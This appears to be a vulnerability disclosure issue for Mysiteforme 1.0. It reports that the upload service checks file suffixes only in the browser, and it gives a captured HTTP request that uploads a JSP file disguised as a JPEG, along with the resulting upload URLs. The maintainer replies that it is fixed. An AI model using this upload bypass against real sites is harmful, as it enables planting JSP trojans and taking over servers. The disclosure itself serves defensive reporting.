Mysiteforme 1.0 has arbitrary File Upload

[LvZCh]

Code Audit:
Src/main/java/com/mysiteform/admin/service/ipl/LocalUploadServiceImpl. The upload file in src/main/java is not protected, resulting in the ability to upload JSP Trojans and HTML files

Vulnerability exploitation:
Upload image interface, just did front-end suffix verification. First upload the image file, then capture the package and change the suffix to JSP or HTML

POST /file/upload/ HTTP/1.1
Host: 192.168.52.132:8080
Content-Length: 209
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryUJ6YUNERWxp4xW7u
Origin: http://192.168.52.132:8080
Referer: http://192.168.52.132:8080/admin/system/site/show
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=cb29c68b-b9cd-4517-8391-f006b785386e
Connection: close

------WebKitFormBoundaryUJ6YUNERWxp4xW7u
Content-Disposition: form-data; name="test"; filename="123.jsp"
Content-Type: image/jpeg

<% out.println("test1234"); %>
------WebKitFormBoundaryUJ6YUNERWxp4xW7u--

http://192.168.52.132:8080/static/upload/db499a9f-c726-409d-b741-2cb82e1a9b01.jsp


http://192.168.52.132:8080/static/upload/f4c37e5f-b649-4a06-9075-11aa7d4a885a.html

[wangl1989]

fixed